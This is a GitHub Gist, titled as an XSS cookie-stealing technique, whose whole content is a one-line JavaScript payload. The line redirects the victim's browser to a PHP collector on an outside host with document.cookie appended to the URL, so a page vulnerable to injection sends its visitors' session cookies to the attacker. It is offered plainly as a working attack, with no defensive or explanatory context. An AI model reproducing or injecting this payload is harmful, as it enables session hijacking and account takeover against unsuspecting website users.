Created
August 17, 2019 15:24
-
-
Save dino213dz/79bd57a47210d6ac23f055a45fb09246 to your computer and use it in GitHub Desktop.
XSS Cookie Steal technique using javascript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.location="http://site.me/csrf_store.php?doc_cookies="+document.cookie; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment